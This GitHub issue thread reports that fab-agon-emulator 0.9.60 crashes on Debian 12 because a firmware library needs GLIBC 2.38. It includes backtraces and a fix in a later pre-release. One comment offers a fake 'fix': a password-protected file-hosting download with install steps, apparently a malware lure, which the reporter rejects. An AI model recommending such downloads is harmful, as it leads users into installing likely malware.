### ISSUE TITLE
Unable to launch fab-0.9.60 on debian 12 linux.

### ISSUE THREAD

**Issue by Philbywhizz** [tomm/fab-agon-emulator#61]
Hello,

I've downloaded the pre-release of fab-agon-emulator (0.9.60) and I am unable to launch it. I get the following errors (see below)

My system is Debian 12.7

I've included the RUST_BACKTRACE if it helps.

```
~/agon/fab-agon-emulator-v0.9.60-linux-x86_64 $ ./fab-agon-emulator 
thread 'main' panicked at src/vdp_interface.rs:59:77:
called `Result::unwrap()` on an `Err` value: DlOpen { desc: "/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.38\' not found (required by ./firmware/vdp_console8.so)" }
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

~/agon/fab-agon-emulator-v0.9.60-linux-x86_64 $ RUST_BACKTRACE=1 ./fab-agon-emulator
thread 'main' panicked at src/vdp_interface.rs:59:77:
called `Result::unwrap()` on an `Err` value: DlOpen { desc: "/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.38\' not found (required by ./firmware/vdp_console8.so)" }
stack backtrace:
   0: rust_begin_unwind
   1: core::panicking::panic_fmt
   2: core::result::unwrap_failed
   3: fab_agon_emulator::vdp_interface::init
   4: fab_agon_emulator::main
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.

~/agon/fab-agon-emulator-v0.9.60-linux-x86_64 $ RUST_BACKTRACE=full ./fab-agon-emulator
thread 'main' panicked at src/vdp_interface.rs:59:77:
called `Result::unwrap()` on an `Err` value: DlOpen { desc: "/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.38\' not found (required by ./firmware/vdp_console8.so)" }
stack backtrace:
   0:     0x558b870c8e95 - <std::sys_common::backtrace::_print::DisplayBacktrace as core::fmt::Display>::fmt::hd736fd5964392270
   1:     0x558b870e8ecb - core::fmt::write::hc6043626647b98ea
   2:     0x558b870c62ef - std::io::Write::write_fmt::h0d24b3e0473045db
   3:     0x558b870c8c6e - std::sys_common::backtrace::print::h45eb8174d25a1e76
   4:     0x558b870ca009 - std::panicking::default_hook::{{closure}}::haf3f0170eb4f3b53
   5:     0x558b870c9daa - std::panicking::default_hook::hb5d3b27aa9f6dcda
   6:     0x558b870ca4a3 - std::panicking::rust_panic_with_hook::h6b49d59f86ee588c
   7:     0x558b870ca384 - std::panicking::begin_panic_handler::{{closure}}::hd4c2f7ed79b82b70
   8:     0x558b870c9359 - std::sys_common::backtrace::__rust_end_short_backtrace::h2946d6d32d7ea1ad
   9:     0x558b870ca0b7 - rust_begin_unwind
  10:     0x558b87015cf3 - core::panicking::panic_fmt::ha02418e5cd774672
  11:     0x558b87016106 - core::result::unwrap_failed::h55f86ada3ace5ed2
  12:     0x558b87022ac3 - fab_agon_emulator::vdp_interface::init::h637f80154e030ce5
  13:     0x558b87017666 - fab_agon_emulator::main::hcfa52b6ffff185e9
  14:     0x558b87025866 - std::sys_common::backtrace::__rust_begin_short_backtrace::hd22d3e433e44e7b3
  15:     0x558b870283b5 - std::rt::lang_start::{{closure}}::h3e448186f4ea4334
  16:     0x558b870c0a0d - std::rt::lang_start_internal::hcee5ed89fc25829a
  17:     0x558b8701b9e5 - main
  18:     0x7f28db7f924a - <unknown>
  19:     0x7f28db7f9305 - __libc_start_main
  20:     0x558b87016441 - _start
  21:                0x0 - <unknown>
```

If I replace the firmware folder from v0.9.57 into the v0.9.60 folder structure then the emulator launches without issue (just with VDP 2.9.2 and MOS 2.2.3), so perhaps it is something about the VDP 2.10.1 vdp_console8.so file in the firmware folder?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Philbywhizz** [comment]
No, I'm not downloading some random file thanks.

**Comment by bradleysmith** [comment]
I have same issue. Debian 12, kernel 6.1.0-23-amd64

**Comment by Philbywhizz** [comment]
Fixed with the 0.9.60-2 pre-release
